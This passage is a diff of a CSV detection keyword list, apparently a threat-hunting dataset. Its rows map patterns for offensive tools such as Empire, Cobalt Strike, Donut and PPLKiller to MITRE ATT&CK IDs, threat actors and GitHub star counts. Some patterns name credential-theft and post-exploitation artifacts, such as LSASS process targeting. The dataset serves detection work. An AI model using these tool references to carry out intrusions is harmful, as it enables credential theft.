and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*processhider.c*","offensive_tool_keyword","Sudomy","Ghost In The Shell - This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process.unlimited your session in metasploit and transparent. Even when it killed. it will re-run again. There always be a procces which while run another process.So we can assume that this procces is unstopable like a Ghost in The Shell","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Vegile","1","1","N/A","N/A","7","686","175","2022-09-01T01:54:35Z","2018-01-02T05:29:48Z" -"*-ProcessID * -Dll * -Module *","offensive_tool_keyword","empire","empire script arguments Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*-ProcessID * -Dll * -Module *","offensive_tool_keyword","empire","empire script arguments Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*processImplantMessage*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" -"*process-inject *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - 
T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1326","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"*process-inject *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" "*processinject_min_alloc*","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","10","10","792","122","2022-11-17T01:04:04Z","2021-08-06T20:55:26Z" -"*ProcessManager.exe --machine *","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" -"*ProcessManager.exe --name explorer*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" -"*processPIDByName*lsass.exe*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","0","N/A","10","8","744","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" -"*ProcessPPKFile*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*ProcessPuTTYLocal*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*ProcessRDPFile*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*ProcessRDPLocal*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*ProcessSuperPuTTYFile*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Process-TaskingPackets*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1059","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*ProcessThoroughLocal*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*ProcessThoroughRemote*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ProcessManager.exe --machine *","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*ProcessManager.exe --name explorer*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*processPIDByName*lsass.exe*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","0","N/A","10","8","745","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" +"*ProcessPPKFile*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ProcessPuTTYLocal*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ProcessRDPFile*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ProcessRDPLocal*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
